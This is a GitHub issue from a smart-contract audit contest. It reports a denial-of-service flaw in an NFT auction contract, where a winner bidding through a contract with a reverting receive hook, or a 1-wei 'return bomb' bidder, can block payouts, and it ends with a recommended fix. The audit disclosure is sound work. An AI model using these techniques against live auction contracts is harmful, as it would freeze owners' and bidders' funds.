Malicious winner can hold an auction hostage #1925
Labels
2 (Med Risk)
Assets not at direct risk, but function/availability of the protocol could be impacted or leak value
bug
Something isn't working
duplicate-739
partial-50
Incomplete articulation of vulnerability; eligible for partial credit only (50%)
Comments
c4-submissions
added
2 (Med Risk)
c4-submissions
added a commit
that referenced
this issue
Nov 13, 2023
|
141345 marked the issue as duplicate of #1952 |
|
alex-ppg marked the issue as not a duplicate |
|
alex-ppg marked the issue as duplicate of #1759 |
c4-judge
added
duplicate-739
partial-50
|
alex-ppg marked the issue as partial-50 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Lines of code
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L104-L120
Vulnerability details
Impact
A contract that wins an auction can postpone owner & refundee’s payments indefinitely.
Proof of Concept
At the time of winning, an Auction holds the owner’s sell fee (equal to what the winning bid is) and also holds extra funds from the non-winning bids. Upon concluding an auction it is expected that the owner & refundees receive their payments. To distribute these fees either an Admin or the winner of the auction has to call
claimAuction(...). The issue is that a malicious actor can bid & win through a contract that has a revertingonERC721Received()hook function. In that caseclaimAuction(...)will revert when it attempts tosafeTransferFrom(...)the NFT to the malicious bidder. In such a manner a malicious winner can have final authority when and if the owner & refundees get their payments. Note that this does require financial commitment from the malicious winner (i.e he has to win the auction), however the funds that will be withheld will be more than what he commits.Additional Note
The same idea of bricking an auction’s funds and NFT but at significantly cheaper cost (eg 1 wei + gas fees) can be executed by a malicious bidder that front runs the first bid through a contract that implements a “return bomb” (memory expansion & copy attack) in the
fallback()function - this will causeclaimAuction(...)to revert when it attempts to refund the 1 wei bidder. This finding however will most likely be deemed OOS because of [L-18] in the bot findigs, nevertheless, I am noting it here for sponsor’s & judge reference since it implies severe consequneces.Coded POC
/testforge test --match-test testForcedRevertclaimAuction(...)revertsTools Used
Manual Inspection
Recommended Mitigation Steps
Separate the logic of claiming the NFT, paying the owner & refunding refundees.
Assessed type
DoS
The text was updated successfully, but these errors were encountered: